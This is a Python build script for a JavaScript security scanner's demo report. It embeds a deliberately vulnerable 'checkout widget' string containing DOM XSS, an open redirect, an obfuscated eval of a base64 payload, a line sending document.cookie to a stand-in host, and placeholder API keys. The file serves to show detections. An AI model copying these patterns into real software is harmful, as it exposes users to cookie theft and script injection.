#!/usr/bin/env python3
"""Build the hosted console's demo report (``webui/demo/report.js``).

The hosted UI is a static page; without a paired local engine a first-time
visitor cannot see anything at all. This script scans a small, clearly
labelled *example* bundle with the real engine and writes the resulting
dashboard payload as ``window.SS_DEMO_REPORT`` -- the "View a demo report"
button on the console then renders it through the exact same pipeline a real
scan uses. Nothing is faked: the numbers, findings and plain-language summary
are whatever the current engine actually reports for the demo snippet, so the
demo can never advertise detections the tool does not make.

Run after changing detection rules::

    python3 tools/build_demo_payload.py          # regenerate
    python3 tools/build_demo_payload.py --check  # exit 1 if out of date
"""

from __future__ import annotations

import json
import sys
from pathlib import Path

ROOT = Path(__file__).resolve().parent.parent
sys.path.insert(0, str(ROOT))

from core.analyzer_service import analyze_files  # noqa: E402
from core.js_parser import parser_status  # noqa: E402
from core.reporter import build_dashboard_payload  # noqa: E402

OUT = ROOT / "webui" / "demo" / "report.js"

# A small, deliberately vulnerable-but-plausible "checkout widget". Every
# construct here is something the engine genuinely detects; the shapes are
# canonical (real provider formats) so the demo shows credible severities.
DEMO_BUNDLE = """// example-checkout.bundle.js -- ScriptSentry demo target.
// A realistic-ish checkout widget with several real problems in it.
var config = {
  api: "https://api.shopper.example.com/v2",
  stripeKey: "pk_live_51DemoNotARealKeyPair00000000000000"
};

// A real-shaped AWS key, split across statements so plain pattern matching
// alone would not see it.
var keyPart1 = "AKIA";
var keyPart2 = "IOSFODNN7EXAMPLE";
var awsAccessKey = keyPart1 + keyPart2;

// Classic DOM XSS: query string straight into innerHTML.
document.querySelector("#go").addEventListener("click", function () {
  var q = new URLSearchParams(location.search).get("q");
  document.getElementById("results").innerHTML = q;
});

// Open redirect via bare assignment.
var next = new URLSearchParams(location.search).get("next");
location = next;

// String-assembled timer argument: eval-class execution.
var userRef = location.hash;
setTimeout("trackRef('" + userRef + "')", 100);

// Sensitive material leaving the page.
fetch("https://telemetry.example.net/collect?c=" + document.cookie);

// Token in localStorage -- readable by any XSS.
localStorage.setItem("authToken", "SG.abcdefabcdefabcdefabcdef.0123456789012345678901234567890123456789012");

// jQuery sink with untrusted data.
$("#coupon-msg").html(decodeURI(location.hash));

// Wildcard-origin postMessage.
window.parent.postMessage({ cart: cartContents }, "*");

// Deobfuscated eval: the callee name is built at runtime.
var fn = String.fromCharCode(101, 118, 97, 108);
window[fn](atob("YWxlcnQoMSk="));

// Ordinary API surface so the inventory view has content too.
fetch(config.api + "/cart?session=" + sessionId)
  .then(function (r) { return r.json(); })
  .then(function (cart) { renderCart(cart); });
"""


def build_payload():
    results = analyze_files([{"filename": "example-checkout.bundle.js", "code": DEMO_BUNDLE}])
    payload = build_dashboard_payload(
        results,
        metadata={"mode": "code", "source": "example-checkout.bundle.js"},
    )
    # Make the demo self-describing wherever the UI prints the engine line.
    payload["meta"]["engine"] = "ScriptSentry demo report"
    payload["meta"]["demo"] = True
    # The meta parser inventory lists *every* parser installed on the build
    # machine (e.g. "tree-sitter" alone vs "tree-sitter" + "esprima"), which
    # made the payload differ between environments whose findings are
    # identical. The demo reports what the *primary* engine finds; pin the
    # inventory to it so the artifact is reproducible across installs.
    status = parser_status()
    parser_meta = payload["meta"].get("ast_parser")
    if status["mode"] == "ast" and isinstance(parser_meta, dict):
        parser_meta["engines"] = [status["name"]]
        # Which engine produced this artifact, so a byte-exact freshness
        # check can pin itself to that engine instead of failing (or
        # silently passing) under a different one.
        payload["meta"]["demo_engine"] = status["name"]
    return payload


def main(argv=None):
    check_only = "--check" in list(sys.argv[1:] if argv is None else argv)

    payload = build_payload()
    content = (
        "// Generated by tools/build_demo_payload.py -- the real engine's report\n"
        "// for the demo bundle. Do not hand-edit.\n"
        "window.SS_DEMO_REPORT = " + json.dumps(payload, ensure_ascii=False, default=str) + ";\n"
    )

    if check_only:
        current = OUT.read_text(encoding="utf-8") if OUT.exists() else ""
        if current != content:
            print("webui/demo/report.js is out of date", file=sys.stderr)
            return 1
        return 0

    OUT.parent.mkdir(parents=True, exist_ok=True)
    OUT.write_text(content, encoding="utf-8")
    findings = payload.get("summary", {}).get("total_findings", "?")
    print(f"Wrote {OUT.relative_to(ROOT)} ({OUT.stat().st_size:,} bytes, "
          f"{findings} findings in the demo report)")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
